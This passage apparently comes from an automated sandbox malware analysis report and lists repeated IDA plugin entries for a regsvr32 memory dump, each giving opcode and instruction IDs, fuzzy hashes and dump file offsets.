                                                                              • Opcode Fuzzy Hash: f2a8cae975ee2677e2189f3865b5dcf7b73b68b5310a9f8f835f3ee05fdb913c
                                                                              • Instruction Fuzzy Hash: 9621C761A1C95A8FE748FB288475278BBD1FF56214F0805B9D05DF31CBCD289841C7A6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 17e054d67725de5cfe7c8336df37f66eea8b31ee5523545e8ae6ce944ec69cac
                                                                              • Instruction ID: 3a1ad9d3efa83469e9232f89353a55dc706d2d714a260f9a076dd4ea54b6e203
                                                                              • Opcode Fuzzy Hash: 17e054d67725de5cfe7c8336df37f66eea8b31ee5523545e8ae6ce944ec69cac
                                                                              • Instruction Fuzzy Hash: 21213752B5C66907E3417E3D7CA92F97FD2DFD523AB48027BE0CCE6093CC05148686A9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 07a1f16be02717d26c24a80157cc1ae96412bd6d5f451363c20605046599a9ba
                                                                              • Instruction ID: 5d659c1411f6b5e4a8e04cd32e26fa4a25513e53705eaf2f178975c6d901c678
                                                                              • Opcode Fuzzy Hash: 07a1f16be02717d26c24a80157cc1ae96412bd6d5f451363c20605046599a9ba
                                                                              • Instruction Fuzzy Hash: 52213B52F1D96E0BE39CE66CA8D1175BBC2EF84660758027AE01DF31CBDC18AC42C2B5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ca23309cf7f4a25a02fcf3dd2185d89b5d15cfef8a1cc67e8be198dad0ac5026
                                                                              • Instruction ID: 41d23ea8b9498474896e0abfb5235e04d9ea5ba0ec57636b55af4ff858d66d4d
                                                                              • Opcode Fuzzy Hash: ca23309cf7f4a25a02fcf3dd2185d89b5d15cfef8a1cc67e8be198dad0ac5026
                                                                              • Instruction Fuzzy Hash: 4E31A972E14E9E4BDB84EB2CD8A62F8BBE1FF54214B440176D01DE3186DE2898419765
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 35f36d8aac30a3613ea4fe0b8d729bd192bfe2fa18e7b13df105058777ff2b4b
                                                                              • Instruction ID: 96cf55e198c7a16ca05f1953df4ee0f565dc62500376c3d7171d9f66f134ce58
                                                                              • Opcode Fuzzy Hash: 35f36d8aac30a3613ea4fe0b8d729bd192bfe2fa18e7b13df105058777ff2b4b
                                                                              • Instruction Fuzzy Hash: 55214B71A0CA5D4FD705AB2C9C695B97FE0EF55221708027FD048D72D3CE189846C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2dcef6df263397c5bad19d7e826f1b47e9ab7ce3869e55dbd2ab986753d728e1
                                                                              • Instruction ID: cf546138a8ab0e11e859093caf4908e43f2b8c1866c6a032c90964a158426157
                                                                              • Opcode Fuzzy Hash: 2dcef6df263397c5bad19d7e826f1b47e9ab7ce3869e55dbd2ab986753d728e1
                                                                              • Instruction Fuzzy Hash: 5F21095291DADA4FFB95E72888B11A4BFE1FF15610B0905FAC088E70DBC90C9804D766
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 006f651036cfa1eb580786ee5287aa5a7601873715a8ed202bff323c3066d230
                                                                              • Instruction ID: 60c704608639e1e1ff45cc2a1c4d342341513bf5006fd03ad69019ec1b815765
                                                                              • Opcode Fuzzy Hash: 006f651036cfa1eb580786ee5287aa5a7601873715a8ed202bff323c3066d230
                                                                              • Instruction Fuzzy Hash: 20214661A1D85E9FEB44EB2CD8A82B8FFA1EF49204F0402BAD01CE31D6CD146844C7A6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4f8e16344261a4b2b19df1b8b88e3b42c0f0fa57787eddb7e3d90a466d671952
                                                                              • Instruction ID: e6f1a3a6449df9d3cbbf7ca4eb7ff5550a2924cc986d516fe78e4f2403ff1335
                                                                              • Opcode Fuzzy Hash: 4f8e16344261a4b2b19df1b8b88e3b42c0f0fa57787eddb7e3d90a466d671952
                                                                              • Instruction Fuzzy Hash: 7131F371C189CDAFEB59DB28C8A90A8FFE0FF00318B4441AAC06997497EE246540CB55
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c4f0f2b2c221ed71984a6ec611ef389858501c4a9d355dbe9ec158ef388cb49
                                                                              • Instruction ID: 23b41e2ee13acbfd48e997a5a083fb0d134281368c790e5accc9b262abe3ac46
                                                                              • Opcode Fuzzy Hash: 3c4f0f2b2c221ed71984a6ec611ef389858501c4a9d355dbe9ec158ef388cb49
                                                                              • Instruction Fuzzy Hash: 44210861A1C95A9BEB48FB288465279F6D2FF46314F040579E05EF31CACE2CA441C7A7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9aaf72afbe3cf071382128231413ca40842ac4ca8754275656b70e6d86034d9b
                                                                              • Instruction ID: 8df0b6af976b5cac74ab8fe309b8db8ecc31bd0862e89ffa7a75bb10eabe721d
                                                                              • Opcode Fuzzy Hash: 9aaf72afbe3cf071382128231413ca40842ac4ca8754275656b70e6d86034d9b
                                                                              • Instruction Fuzzy Hash: 2511E752A1C96A4BE755E62CE8F15F9ABD1EFD122074800B7E05DE608BDD08A846C2B5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73c74e332d9e71b4f6765b42565fe967555236ae9a43dfeaf5da46332c909a57
                                                                              • Instruction ID: 63a253f76ca4a045b04341145c2302d0d90130d4db5d41c54a36dfe665daee6a
                                                                              • Opcode Fuzzy Hash: 73c74e332d9e71b4f6765b42565fe967555236ae9a43dfeaf5da46332c909a57
                                                                              • Instruction Fuzzy Hash: 4611A561E1C95D9FDB54E75888A19B8FBE1FF48714B0401B5E00DE3196CE18A8409BE6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8a1755bb43beed5f0bb05bd72012c876718342d6ae6b68a398cf5975a04fea58
                                                                              • Instruction ID: 3b9b667b81ceec131780d79bd7a0b277e08fccb583291fc0c0d3e08da5a5651f
                                                                              • Opcode Fuzzy Hash: 8a1755bb43beed5f0bb05bd72012c876718342d6ae6b68a398cf5975a04fea58
                                                                              • Instruction Fuzzy Hash: A711E01144E7D60BE35393749865191BFE1AE83220B0D01EBD484CF0E7D94E988AC376
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9f0089848ff48e9731ce4f5e4744735d8ddbe0d64341f2d7a8ab5239136c28ac
                                                                              • Instruction ID: e3ff44b5b30dc6430b96500b1a03939aa409636680771f6001e389ed59e1996d
                                                                              • Opcode Fuzzy Hash: 9f0089848ff48e9731ce4f5e4744735d8ddbe0d64341f2d7a8ab5239136c28ac
                                                                              • Instruction Fuzzy Hash: E2112C71A18D5D5FDB58EB2C886D679BAE1FF98311B04027FE00DE32E5CE2098418795
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 603dc4b2f56774c3463bce5f6750201d42047d9c7c7fc597d5c8f527cb1044f7
                                                                              • Instruction ID: 095c460fdac0e59562f57fda054bb57d768749f2146bdb620525348b41aea65c
                                                                              • Opcode Fuzzy Hash: 603dc4b2f56774c3463bce5f6750201d42047d9c7c7fc597d5c8f527cb1044f7
                                                                              • Instruction Fuzzy Hash: 1021D87061CB558BDB44EE4CC89592AFBE1FFE9B80F10482DE145932A4CA35F841DB96
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 41509b2f4db04b31368ecbfa596835b321207f8e1bf6f4846f12575c40abf0fd
                                                                              • Instruction ID: ea7e09bbc16eb30925042cfe63fe50ae0421502be6f38fcb6195c75105971e6f
                                                                              • Opcode Fuzzy Hash: 41509b2f4db04b31368ecbfa596835b321207f8e1bf6f4846f12575c40abf0fd
                                                                              • Instruction Fuzzy Hash: 5E110122A0EA9D4FF742E728D8A51A8BFA0EF42218F1801F7D018DA0E7DD245985C765
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f5ec631f44e461638280084a1a4ed7b829d9df437ba436eb18ff751ab4e7cb14
                                                                              • Instruction ID: 99ac3aec119dd02677326f8ab4a9476c5e61d7ff83b4b0fbd0b3310753ffe59c
                                                                              • Opcode Fuzzy Hash: f5ec631f44e461638280084a1a4ed7b829d9df437ba436eb18ff751ab4e7cb14
                                                                              • Instruction Fuzzy Hash: 2311C631A0C51D8FE768DA08D8A25B8BBE0EF8D321F00017ED05EE3696DF257C42C668
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9f76214550a20510dd4e8b241d713a0f817e5ab80b5a0ed8a9697e36b5fbaa51
                                                                              • Instruction ID: bd002468f09ae09fd4b214772a09cf7d060039fc27a64cd5b0fc9880d6b829d3
                                                                              • Opcode Fuzzy Hash: 9f76214550a20510dd4e8b241d713a0f817e5ab80b5a0ed8a9697e36b5fbaa51
                                                                              • Instruction Fuzzy Hash: D011FE316085188FDB58DF18E455AA9B7E1FB99311F1041AFD04EE3666DE31AD428B44
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c784fc741932d0e81af9bce6803d3c1c419d7df7f76e71ba7a755eca14c30dab
                                                                              • Instruction ID: c47277c1ff8f4affd3fda32e11ac3390ab9ba0f185e3fc078fda09c68eaf9bec
                                                                              • Opcode Fuzzy Hash: c784fc741932d0e81af9bce6803d3c1c419d7df7f76e71ba7a755eca14c30dab
                                                                              • Instruction Fuzzy Hash: B411A16250E6E44FE79297389875AA07FF0EF9721070901EBE089CB1E7D918A845C762
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b81f442ae956b0dda5273be3d7c56751e0877131bb1bf919dfa5d6b18e65c8af
                                                                              • Instruction ID: 80ee16252f096677dbd4f77f33b0d7913a64fa5c8cc2ef88d5a928720ba9a943
                                                                              • Opcode Fuzzy Hash: b81f442ae956b0dda5273be3d7c56751e0877131bb1bf919dfa5d6b18e65c8af
                                                                              • Instruction Fuzzy Hash: 9D110621A0DBCA4FD712D72498B16A9BFB1EF43210B4A41E7D049D74D7D9186845C762
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db81557532782346f23aeb99bc6aa06c95a67aa5968c7064e6f466c1ca2852be
                                                                              • Instruction ID: e4641b7a468957b4131c4632818261acc2de7e4b0b8beb268fb7d0b93d8a54c9
                                                                              • Opcode Fuzzy Hash: db81557532782346f23aeb99bc6aa06c95a67aa5968c7064e6f466c1ca2852be
                                                                              • Instruction Fuzzy Hash: C601E121B1882D5FEBD4FB58D4A66BCB6A2FF88210F440139D11EF32CACE296801D774
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 95a2e5f3a0308a8939ebc3e6ba7628e4bff6ea8c3c7676415de554a7fdea81d3
                                                                              • Instruction ID: ebe864e728f083fe0207fc83881740ec48ddbd07dd0c93a4c9ca08c726983225
                                                                              • Opcode Fuzzy Hash: 95a2e5f3a0308a8939ebc3e6ba7628e4bff6ea8c3c7676415de554a7fdea81d3
                                                                              • Instruction Fuzzy Hash: 19014751B1DDAA4FE748E62C88F5170BBD2EF49210B0801BAD00CF32CADD08AC09C772
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c7fe857c11c28e4606e427f1e1285dd8a6809281bbc3a778950f750a1b6492e7
                                                                              • Instruction ID: 3054503a43876182b28d07c488b2a537b849c17c4e4548dbc01fc2215073952f
                                                                              • Opcode Fuzzy Hash: c7fe857c11c28e4606e427f1e1285dd8a6809281bbc3a778950f750a1b6492e7
                                                                              • Instruction Fuzzy Hash: 9A01F711F28E1A0BE798F36C94E5AB6F7E2EF94210708017AD01ED32CACD18E841C750
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 30290d248d4a3deb5ccd60787fc6a78f25600ef44c51b671dee70a109e7cdac6
                                                                              • Instruction ID: aa9fc0bc15aa2db73bf25d3d1c26656115ff5a08a17bdfd671aa9313c55e05b2
                                                                              • Opcode Fuzzy Hash: 30290d248d4a3deb5ccd60787fc6a78f25600ef44c51b671dee70a109e7cdac6
                                                                              • Instruction Fuzzy Hash: 42F0F451A4DA8D0FD745E27C6C69270BFD0EB99225B0803BBD04CD32A7C849984583A6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5709b18d68c96f18c2b0e50edd1a81ec9a7085a61f4d0c54a5a18b011dc2769e
                                                                              • Instruction ID: 6eb7754106caf7e87e60c3ca9ad47a5e6be84fe37fb8b79cf19cb66ce3e0cfb2
                                                                              • Opcode Fuzzy Hash: 5709b18d68c96f18c2b0e50edd1a81ec9a7085a61f4d0c54a5a18b011dc2769e
                                                                              • Instruction Fuzzy Hash: A4F0E912B0DD5D0FEB98E16D68E52B5A7C1EBD863170401B7D01DD32DACD08AC46C3B6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d20f1541536e6261e50dda108c6e748fa2c2b185a1c36acf7f11ae06e076c7fc
                                                                              • Instruction ID: fab045c693c377139428306b299cd4eac46a995c906f3dae7a74d67dd6459f29
                                                                              • Opcode Fuzzy Hash: d20f1541536e6261e50dda108c6e748fa2c2b185a1c36acf7f11ae06e076c7fc
                                                                              • Instruction Fuzzy Hash: 1DF0F651A1DBD90FD34A966C5C68671BFE1DB9B120B0902FBE05CD31E7C8484C4583B2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f13600e7c6f06d08773fc034e345b999ed656fbfab7254bc6bca8f0a09281e4d
                                                                              • Instruction ID: f5a3610e03f735a05fd11a0977874b428a68f741184c862a7f04644f2b06fa18
                                                                              • Opcode Fuzzy Hash: f13600e7c6f06d08773fc034e345b999ed656fbfab7254bc6bca8f0a09281e4d
                                                                              • Instruction Fuzzy Hash: 5C01A432B0D86D8FF7A1C61CD4906797BD2EF95321B1407B2D02DD72D8DA68AD41CBA4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b0235a324df7bc7504c8dc007eb4a6fba6526dd4304c774d001beeed96d6ee22
                                                                              • Instruction ID: 0759fbd09e22dd07895a715104ef6fe99d2d5d59bb8f850a361c307a878e6213
                                                                              • Opcode Fuzzy Hash: b0235a324df7bc7504c8dc007eb4a6fba6526dd4304c774d001beeed96d6ee22
                                                                              • Instruction Fuzzy Hash: CEF02B63D4C69D07FB12AA18DCF20E57F90EF42229B4C41B2D49C5A0D7D9042855CBF4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3bef07937c396f8b9224a5571c664a1cc2617290862fb8753fcfe037aa0fbaa1
                                                                              • Instruction ID: 65b3c70f5f11b98a16b151c75512d22e6cb47930077c42ac806fee8d6ab67652
                                                                              • Opcode Fuzzy Hash: 3bef07937c396f8b9224a5571c664a1cc2617290862fb8753fcfe037aa0fbaa1
                                                                              • Instruction Fuzzy Hash: EBF02E11708C1D0B6B98E55D58D56BAA7C2EBD8630740017AD00DD32CCCD04AC42C7E5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c5483b016ad625379374a83e9c6c0d1a5339ec9de6e9b50f05af84d1295ccd9a
                                                                              • Instruction ID: f226195ffb425370d51c6ba6aac2841356664fd35667a16e63d8384fe619f14c
                                                                              • Opcode Fuzzy Hash: c5483b016ad625379374a83e9c6c0d1a5339ec9de6e9b50f05af84d1295ccd9a
                                                                              • Instruction Fuzzy Hash: 46F0E95292CA954BE748A63C58661A4BBC1EB85524F4401B6D09DE31C6D95C9C4183B6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eb0caedcd989fbce880c4486fab1db4bf5d1ea6c6419c431cf37bb3b5b4a53eb
                                                                              • Instruction ID: af53587bbb2777ce3110756f4aaf056691cacf1304b45216a2016881d3b103c2
                                                                              • Opcode Fuzzy Hash: eb0caedcd989fbce880c4486fab1db4bf5d1ea6c6419c431cf37bb3b5b4a53eb
                                                                              • Instruction Fuzzy Hash: 12F02E12A5D99E5FD79CE22C58712B0BBC1EB89134F0802BBD04CD31D7D94C988183BB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 622d1ed3b3cd74283780d6a4d0c15818d89efa0d52db2aa31fcf46a49e0c5cc6
                                                                              • Instruction ID: 419d4ba8d392599d578f0c9ca7dc884e4c323bb3a581e7278867c8a195b19c96
                                                                              • Opcode Fuzzy Hash: 622d1ed3b3cd74283780d6a4d0c15818d89efa0d52db2aa31fcf46a49e0c5cc6
                                                                              • Instruction Fuzzy Hash: 95F02E22B5CC5E5FDE98F32C98A5EB9A7D1EF9920074C0176E10DD31C9DD09E88183A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0cf16045441b4753efd3254fbbc99bf12de292c839d7b4885132577c24341dac
                                                                              • Instruction ID: 4548a58f6ffb5d771d53e3658b70c806fe76a171774957276a96b34aa3a64c4c
                                                                              • Opcode Fuzzy Hash: 0cf16045441b4753efd3254fbbc99bf12de292c839d7b4885132577c24341dac
                                                                              • Instruction Fuzzy Hash: 4DF02E42E0CAAB4AE76D522458F2174FF81FF55600B1801F6D0A8E72DBCC4D9C42D3B6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b443161b0e71233ce142c5090c3d67add8adb0cc776ec491686183283d1914e1
                                                                              • Instruction ID: 9817c3d561496b3cbc410e79b473f4043cf9e60dd7b5ad24ff163383bd8b3fea
                                                                              • Opcode Fuzzy Hash: b443161b0e71233ce142c5090c3d67add8adb0cc776ec491686183283d1914e1
                                                                              • Instruction Fuzzy Hash: 8701E87061CB958BDB44DE4CC49582AFBE0FBE9B80F10092EF185932A4D630E841DB97
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5161e46984cf57850a4c601dfa93facc5e2153849b75ccaebadd8f2963e3722a
                                                                              • Instruction ID: 68027a2771668d4992a583cbd332882ca3c0485eb79ca7692bbd29f189ca69cf
                                                                              • Opcode Fuzzy Hash: 5161e46984cf57850a4c601dfa93facc5e2153849b75ccaebadd8f2963e3722a
                                                                              • Instruction Fuzzy Hash: C5F0F26284E7C94FDB2387244CB60A4BF70AE13110B4E42EBC4D88B0E7D518990AD366
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
